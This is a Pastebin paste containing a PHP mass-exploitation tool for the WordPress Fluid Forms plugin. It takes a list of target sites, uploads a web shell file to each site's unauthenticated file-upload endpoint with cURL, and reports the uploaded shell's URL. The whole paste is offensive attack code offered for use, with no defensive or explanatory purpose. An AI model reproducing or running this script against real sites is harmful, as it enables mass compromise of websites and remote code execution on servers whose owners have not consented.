API tools faq
paste
KeyDown

WP FluidForm Mass Exploiter

KeyDown
Jan 2nd, 2016
458
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.46 KB | None | 0 0
raw download clone embed print report
  1. visit my blog => www.annamcoder.tk
  2.  
  3. CUT HERE --------------------------------------------------------------------------------------------------------------------------
  4.  
  5. <style>
  6. .inipre {
  7. width:900px;
  8. text-align: left;
  9. }
  10. </style>
  11.  
  12. <center><br><br>
  13. <font color="lime" size="6">
  14. <b>WP FluidForm exploiter</b></font>
  15. <br><br>
  16. <form action="" method="POST">
  17. <textarea name="url" style="margin: 0px; width: 626px; height: 236px;">put your target without http://
  18. example :
  19.  
  20. www.site.com
  21. www.site2.com
  22. www.site3.com
  23. www.site4.com
  24. www.site5.com
  25. </textarea><br>
  26. <br><br><input type="submit" class="btn btn-success" value="-=[ GO TO HELL SOON ]=-"/></form>
  27. <br><br>
  28. <?php
  29. #===============================================#
  30. #----------WP FluidForm Mass Exploiter----------#
  31. #------------Coded By Synchronizer--------------#
  32. #-Gretz : Stupidc0de - IDCA - Indonesian Coder--#
  33. #===============================================#
  34. if(isset($_POST['url'])) {
  35. function StupidC0de($URL) {
  36. if(!function_exists('curl_init')) {
  37. die ("Curl PHP package not installed");
  38. }
  39. $uploadfile= "ha.php"; #Your Shell here
  40. $synchronizer = curl_init();
  41. curl_setopt($synchronizer, CURLOPT_POST, true);
  42. curl_setopt($synchronizer, CURLOPT_POSTFIELDS,
  43. array('files[]'=>"@$uploadfile"));
  44. curl_setopt($synchronizer, CURLOPT_RETURNTRANSFER, 1);
  45. curl_setopt($synchronizer, CURLOPT_URL, $URL);
  46. curl_setopt($synchronizer, CURLOPT_HEADER, false);
  47. $response = curl_exec($synchronizer);
  48. return $response;
  49. }
  50. $textarea = htmlspecialchars(trim($_POST['url']));
  51. $j = explode("\r\n",$textarea);
  52. foreach($j as $sync){
  53. $n = StupidC0de($sync."/wp-content/plugins/fluid_forms/file-upload/server/php/");
  54. $p = str_replace('"url":"', '</font><br>shellfile : <font color=green>', $n);
  55. $q = str_replace('","delete_url":"', '</font><br>deletfile : <font color=green>', $p);
  56. $x = str_replace('{"files":[{"name":"', "file name : <font color=green>", $q);
  57. $y = str_replace('","size":', "</font><br>file size : <font color=green>", $x);
  58. $a = str_replace(',"type":"', "</font><br>file type : <font color=green>", $y);
  59. $s = str_replace('","delete_type":"DELETE"}]}', "", $a);
  60. $xz = str_replace('\/', "/", $s);
  61.  
  62. if(preg_match('/shellfile : /',$xz)==1) {
  63. echo "<center><pre class='inipre'><center>RESULT FOR <font color=blue>".$sync."</font></center><br><font color=red><b><br>".$xz."</b></font></pre></center><br><br>";
  64. } else {
  65. echo "<center>".$sync."<font color=red><b> - FAILED !</b></font></center><br>";
  66. }
  67.  
  68. }
  69. }
  70. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!